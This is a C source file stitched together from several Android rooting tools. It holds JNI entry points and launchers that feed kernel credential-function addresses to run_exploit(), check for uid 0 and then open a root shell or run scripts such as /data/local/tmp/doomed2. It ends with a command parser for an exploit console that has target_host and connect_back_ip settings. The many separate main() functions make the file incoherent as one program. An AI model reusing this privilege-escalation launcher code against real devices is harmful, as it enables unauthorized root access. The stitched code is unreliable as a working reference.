/*
 * JNI entry point behind MainActivity.native_getroot in the
 * biz.hagurekamome.rootkitapp package.
 *
 * Stores the three caller-supplied addresses in prepare_kernel_cred,
 * commit_creds and ptmx_fops (all declared outside this function), calls
 * run_exploit(), and reports whether the process then runs as uid 0.
 *
 * The addresses are used exactly as passed in; nothing here validates them.
 * Each jlong is narrowed through unsigned long before use.
 * NOTE(review): where unsigned long is 32 bits wide this drops the upper
 * half of the jlong - confirm the Java side only passes values that fit.
 *
 * Returns 0 when getuid() reports 0 after run_exploit(), -1 otherwise.
 */
JNIEXPORT int JNICALL
Java_biz_hagurekamome_rootkitapp_MainActivity_native_1getroot(JNIEnv *env, jobject jo, jlong prepare_kernel_cred_addr, jlong commit_creds_addr, jlong ptmx_fops_addr)
{
    /* Neither JNI handle is needed; only the numeric arguments are read. */
    (void)env;
    (void)jo;

    ptmx_fops = (unsigned long)ptmx_fops_addr;
    prepare_kernel_cred = (void *)(unsigned long)prepare_kernel_cred_addr;
    commit_creds = (void *)(unsigned long)commit_creds_addr;

    run_exploit();

    /* The only success signal is the uid of the calling process. */
    return (getuid() == 0) ? 0 : -1;
}
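/*
 * Command-line launcher.
 *
 * Usage: <prog> [-c command]
 *
 * Calls device_detected() and setup_variables(), then run_exploit(), and
 * checks with getuid() whether the process now runs as uid 0.  On success it
 * either starts an interactive /system/bin/sh (no -c given) or replaces the
 * process with "/system/bin/sh -c <command>".
 *
 * Exit status: EXIT_FAILURE when setup fails, when the uid is not 0 after
 * run_exploit(), or when execl() fails; EXIT_SUCCESS after the interactive
 * shell returns.  With -c the status is that of the exec'd shell.
 */
int main(int argc, char **argv)
{
    char *command = NULL;
    int i;

    /*
     * Only "-c <command>" is recognised.  The last occurrence wins, a
     * trailing "-c" without an argument is ignored, and every other
     * argument is skipped silently.
     */
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-c") == 0 && ++i < argc) {
            command = argv[i];
        }
    }

    device_detected();

    if (!setup_variables()) {
        printf("Failed to setup variables.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    if (getuid() != 0) {
        printf("Failed to obtain root privilege.\n");
        exit(EXIT_FAILURE);
    }

    if (command == NULL) {
        system("/system/bin/sh");
        exit(EXIT_SUCCESS);
    }

    /*
     * The argument list of a variadic exec call must end with a null
     * *pointer*; a bare NULL may be an integer constant, so cast it.
     */
    execl("/system/bin/sh", "/system/bin/sh", "-c", command, (char *)NULL);

    /*
     * execl() returns only on failure.  Report it instead of falling through
     * to a success exit status, which would hide that the command never ran.
     */
    perror("execl");
    exit(EXIT_FAILURE);
}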
/*
 * Launcher that resolves its kernel addresses before calling run_exploit().
 *
 * Steps, in order:
 *   1. pass 0x200000 to set_kernel_phys_offset();
 *   2. store the result of get_remap_pfn_range_address() in remap_pfn_range
 *      and stop if it is zero;
 *   3. call setup_creds_functions() and stop if it reports failure;
 *   4. call run_exploit() and check getuid();
 *   5. on uid 0, run /system/bin/sh through system().
 *
 * Exit status: EXIT_FAILURE with a message on stdout for any failed step,
 * EXIT_SUCCESS once the shell has returned.  Command-line arguments are
 * not used.
 */
int main(int argc, char **argv)
{
    const char *failure = NULL;

    (void)argc;
    (void)argv;

    set_kernel_phys_offset(0x200000);
    remap_pfn_range = get_remap_pfn_range_address();

    /* Walk the steps until one fails; remember only the first failure. */
    if (!remap_pfn_range) {
        failure = "You need to manage to get remap_pfn_range addresses.\n";
    } else if (!setup_creds_functions()) {
        failure = "Failed to get prepare_kernel_cred and commit_creds addresses.\n";
    } else {
        run_exploit();
        if (getuid() != 0) {
            failure = "Failed to obtain root privilege.\n";
        }
    }

    if (failure != NULL) {
        printf("%s", failure);
        exit(EXIT_FAILURE);
    }

    system("/system/bin/sh");
    exit(EXIT_SUCCESS);
}
/*
 * Minimal launcher: calls run_exploit() with no setup of its own, then
 * uses getuid() to decide what to do.
 *
 * If the uid is 0, /system/bin/sh is run through system() and the program
 * exits with EXIT_SUCCESS when that shell returns.  Otherwise a failure
 * message is printed and the program exits with EXIT_FAILURE.
 * Command-line arguments are not used.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    run_exploit();

    if (getuid() == 0) {
        system("/system/bin/sh");
        exit(EXIT_SUCCESS);
    }

    printf("Failed to obtain root privilege.\n");
    exit(EXIT_FAILURE);
}
/*
 * Launcher that needs setup_creds_functions() to succeed before it calls
 * run_exploit().
 *
 * After run_exploit() the uid is checked with getuid(); on uid 0,
 * /system/bin/sh is run through system().
 *
 * Exit status: EXIT_FAILURE (with a message on stdout) when
 * setup_creds_functions() fails or the uid is not 0; EXIT_SUCCESS once the
 * shell has returned.  Command-line arguments are not used.
 */
int main(int argc, char **argv)
{
    int creds_ready;

    (void)argc;
    (void)argv;

    creds_ready = setup_creds_functions() ? 1 : 0;
    if (creds_ready == 0) {
        printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    if (getuid() == 0) {
        system("/system/bin/sh");
        exit(EXIT_SUCCESS);
    }

    printf("Failed to obtain root privilege.\n");
    exit(EXIT_FAILURE);
}
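/*
 * JNI entry point behind MainActivity.native_getroot in the
 * biz.hagurekamome.getroot package.
 *
 * jstr is a directory path.  The function builds the command line
 *
 *     <dir>/install_tool.sh <dir> >/data/local/tmp/err.txt 2>&1
 *
 * then calls detect_injection_addresses(), copies prepare_kernel_cred and
 * commit_creds from supported_devices[st_pos], calls run_exploit(), and,
 * if getuid() then reports 0, runs the command line through system().
 *
 * Returns:
 *   -1  detect_injection_addresses() reported failure
 *   -2  the uid is not 0 after run_exploit()
 *   -3  jstr is NULL, cannot be read, or is too long for the command buffer
 *   otherwise the value returned by system() (0 on success)
 *
 * NOTE(review): the path is pasted unquoted, twice, into a command line
 * that a shell interprets after the uid check has passed.  Spaces or shell
 * metacharacters in it change what is executed, so the Java caller must
 * only ever pass a fixed, app-controlled directory, never anything derived
 * from external input.
 */
JNIEXPORT int JNICALL
Java_biz_hagurekamome_getroot_MainActivity_native_1getroot(JNIEnv *env, jobject jo, jstring jstr)
{
    char cachebuf[256];
    const char *execommand = "/install_tool.sh ";
    const char *param = " >/data/local/tmp/err.txt 2>&1";
    const char *str;
    size_t path_len;
    size_t fixed_len;
    int result;

    (void)jo;

    if (jstr == NULL) {
        return -3;
    }

    /* GetStringUTFChars() returns NULL when it cannot allocate the copy. */
    str = (*env)->GetStringUTFChars(env, jstr, NULL);
    if (str == NULL) {
        return -3;
    }

    /*
     * The path appears twice in the command line, so the buffer must hold
     * 2 * path_len plus both fixed fragments plus the terminating NUL.
     * Check that before copying: the unbounded strcpy()/strcat() sequence
     * would otherwise write past cachebuf for a long path.
     */
    path_len = strlen(str);
    fixed_len = strlen(execommand) + strlen(param) + 1;
    if (fixed_len > sizeof cachebuf ||
        path_len > (sizeof cachebuf - fixed_len) / 2) {
        (*env)->ReleaseStringUTFChars(env, jstr, str);
        return -3;
    }

    /* Length verified above, so these copies stay inside cachebuf. */
    strcpy(cachebuf, str);
    strcat(cachebuf, execommand);
    strcat(cachebuf, str);
    strcat(cachebuf, param);

    /* cachebuf now holds its own copy; hand the JNI string back. */
    (*env)->ReleaseStringUTFChars(env, jstr, str);

    if (!detect_injection_addresses()) {
        return -1;
    }

    prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred;
    commit_creds = supported_devices[st_pos].commit_creds;

    run_exploit();

    if (getuid() != 0) {
        return -2;
    }

    /* Non-zero results from system() are passed through unchanged. */
    result = system(cachebuf);
    return result;
}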
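/*
 * Command-line launcher with address setup.
 *
 * Usage: <prog> [-c command]
 *
 * Passes 0x200000 to set_kernel_phys_offset(), stores the result of
 * get_remap_pfn_range_address() in remap_pfn_range, calls
 * setup_creds_functions(), then run_exploit(), and checks with getuid()
 * whether the process now runs as uid 0.  On success it either starts an
 * interactive /system/bin/sh (no -c given) or replaces the process with
 * "/system/bin/sh -c <command>".
 *
 * Exit status: EXIT_FAILURE when a setup step fails, when the uid is not 0
 * after run_exploit(), or when execl() fails; EXIT_SUCCESS after the
 * interactive shell returns.  With -c the status is that of the exec'd
 * shell.
 */
int main(int argc, char **argv)
{
    char *command = NULL;
    int i;

    /*
     * Only "-c <command>" is recognised.  The last occurrence wins, a
     * trailing "-c" without an argument is ignored, and every other
     * argument is skipped silently.
     */
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-c") == 0 && ++i < argc) {
            command = argv[i];
        }
    }

    set_kernel_phys_offset(0x200000);

    remap_pfn_range = get_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        exit(EXIT_FAILURE);
    }

    if (!setup_creds_functions()) {
        printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    if (getuid() != 0) {
        printf("Failed to obtain root privilege.\n");
        exit(EXIT_FAILURE);
    }

    if (command == NULL) {
        system("/system/bin/sh");
        exit(EXIT_SUCCESS);
    }

    /*
     * The argument list of a variadic exec call must end with a null
     * *pointer*; a bare NULL may be an integer constant, so cast it.
     */
    execl("/system/bin/sh", "/system/bin/sh", "-c", command, (char *)NULL);

    /*
     * execl() returns only on failure.  Report it instead of falling through
     * to a success exit status, which would hide that the command never ran.
     */
    perror("execl");
    exit(EXIT_FAILURE);
}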
/*
 * Launcher that prints a version banner and changelog, then follows the
 * same sequence as the plain launchers: pass 0x200000 to
 * set_kernel_phys_offset(), resolve remap_pfn_range, call
 * setup_creds_functions(), call run_exploit(), and check getuid().
 *
 * On uid 0 it does not open an interactive shell; it runs the script
 * /data/local/tmp/doomed2 through /system/bin/sh via system().
 * NOTE(review): the script is taken from /data/local/tmp and is executed
 * after the uid check has passed; nothing here checks who owns it or what
 * it contains.
 *
 * Exit status: EXIT_FAILURE (with a message on stdout) when a setup step
 * fails or the uid is not 0; EXIT_SUCCESS once system() has returned.
 * Command-line arguments are not used.
 */
int main(int argc, char **argv)
{
    /* Banner text, printed verbatim and in order. */
    static const char *const banner[] = {
        "run_root_shell v2.2\n",
        "Based on pref_event exploit\n\n",
        "Modified for auto-rooting by DooMLoRD\n",
        "Part of Easy Rooting Toolkit\n\n",
        "Changelog:\n",
        "v2.0: added support for Xperia S (LT26) {FW: 6.2.B.0.211} [Cust: 1257-8080]\n",
        "v2.1: added support for Xperia Z (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n",
        "v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284} [Cust: 1272-1092]\n",
    };
    size_t k;

    (void)argc;
    (void)argv;

    for (k = 0; k < sizeof banner / sizeof banner[0]; k++) {
        printf("%s", banner[k]);
    }

    set_kernel_phys_offset(0x200000);

    remap_pfn_range = get_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        exit(EXIT_FAILURE);
    }

    if (!setup_creds_functions()) {
        printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    if (getuid() == 0) {
        printf("Launching auto-root script!\n");
        system("/system/bin/sh /data/local/tmp/doomed2");
        exit(EXIT_SUCCESS);
    }

    printf("Failed to obtain root privilege.\n");
    exit(EXIT_FAILURE);
}
/*
 * Launcher driven by a device table.
 *
 * detect_injection_addresses() must succeed first; the function then copies
 * prepare_kernel_cred and commit_creds from supported_devices[st_pos],
 * calls run_exploit(), and checks getuid().  On uid 0 it runs EXECCOMMAND
 * (a macro defined outside this function) through system().
 *
 * Exit status: -1 returned from main when detection fails, EXIT_FAILURE
 * when the uid is not 0 after run_exploit(), EXIT_SUCCESS once system()
 * has returned.  Command-line arguments are not used.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    if (!detect_injection_addresses()) {
        /* Detection failure is silent: no message, just the status. */
        return -1;
    }

    prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred;
    commit_creds = supported_devices[st_pos].commit_creds;

    printf("Try Get TempRoot...\n");
    run_exploit();

    if (getuid() == 0) {
        printf("Succeeded in getroot!\n");
        system(EXECCOMMAND);
        exit(EXIT_SUCCESS);
    }

    printf("Failed to getroot.\n");
    exit(EXIT_FAILURE);
}
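/*
 * Parse one console line and act on every command found in it.
 *
 * The line is split in place on single spaces with strtok(), so `line` is
 * modified.  Recognised commands:
 *
 *   set target_host <value>       copy <value> into target_host
 *   set connect_back_ip <value>   copy <value> into connect_back_ip
 *   show exploits                 list modules of type "EXPLOIT"
 *   use exploit <id|path>         select a module by number or by path
 *   exploit                       run the selected module if
 *                                 check_exploit_params() accepts it
 *
 * Every strtok() result is checked before use: a command given without its
 * arguments (for example a bare "set" or "use exploit") is ignored instead
 * of passing NULL to strcmp(), chomp() or snprintf().  A token consumed as
 * an argument is never tested again as a command word.
 *
 * NOTE(review): only the arguments of "show" and "use exploit" are passed
 * through chomp(); whether `line` still ends in a newline when it reaches
 * this function is not visible here - confirm against the caller.
 * NOTE(review): 254 is the copy limit already used for target_host and
 * connect_back_ip; their declared sizes are not visible here.
 *
 * Returns 0 in every case, so callers that read the result get a defined
 * value.
 */
int parse_command(char *line)
{
    char *token;
    char *arg;
    int module_id;

    if (line == NULL) {
        return 0;
    }

    token = strtok(line, " ");
    while (token != NULL) {
        if (strcmp(token, "set") == 0) {
            /* set <name> <value> */
            arg = strtok(NULL, " ");
            if (arg != NULL && strcmp(arg, "target_host") == 0) {
                arg = strtok(NULL, " ");
                if (arg != NULL) {
                    snprintf(target_host, 254, "%s", arg);
                    printf("\n%s[!]%s target_host set : %s\n\n", _GREEN, _ENDC, target_host);
                }
            } else if (arg != NULL && strcmp(arg, "connect_back_ip") == 0) {
                arg = strtok(NULL, " ");
                if (arg != NULL) {
                    snprintf(connect_back_ip, 254, "%s", arg);
                    printf("\n%s[!]%s connect_back_ip set : %s\n\n", _GREEN, _ENDC, connect_back_ip);
                }
            }
        } else if (strcmp(token, "show") == 0) {
            /* show <what> */
            arg = strtok(NULL, " ");
            if (arg != NULL) {
                chomp(arg);
                if (strcmp(arg, "exploits") == 0) {
                    show_all_modules_by_type("EXPLOIT");
                }
            }
        } else if (strcmp(token, "use") == 0) {
            /* use exploit <id|path> */
            arg = strtok(NULL, " ");
            if (arg != NULL && strcmp(arg, "exploit") == 0) {
                arg = strtok(NULL, " ");
                if (arg != NULL) {
                    chomp(arg);
                    if (is_int(arg)) {
                        /* Numeric selector: convert once, then look it up. */
                        module_id = atoi(arg);
                        if (module_exists(module_id)) {
                            current_exploit = module_id;
                            printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC);
                        } else {
                            printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC);
                        }
                    } else {
                        /* Anything else is treated as a module path. */
                        current_exploit = find_module_by_path(arg);
                        if (current_exploit >= 0) {
                            printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC);
                        } else {
                            printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC);
                        }
                    }
                }
            }
        } else if (strcmp(token, "exploit") == 0) {
            /* exploit: needs a module selected and its parameters accepted */
            if (current_exploit < 0) {
                printf("\n%s[!]%s no exploit set \n\n", _RED, _ENDC);
            } else if (check_exploit_params()) {
                run_exploit();
            }
        }

        /*
         * NOTE(review): strtok() keeps its position in hidden static state;
         * this assumes none of the helpers called above use strtok()
         * themselves - confirm.
         */
        token = strtok(NULL, " ");
    }

    return 0;
}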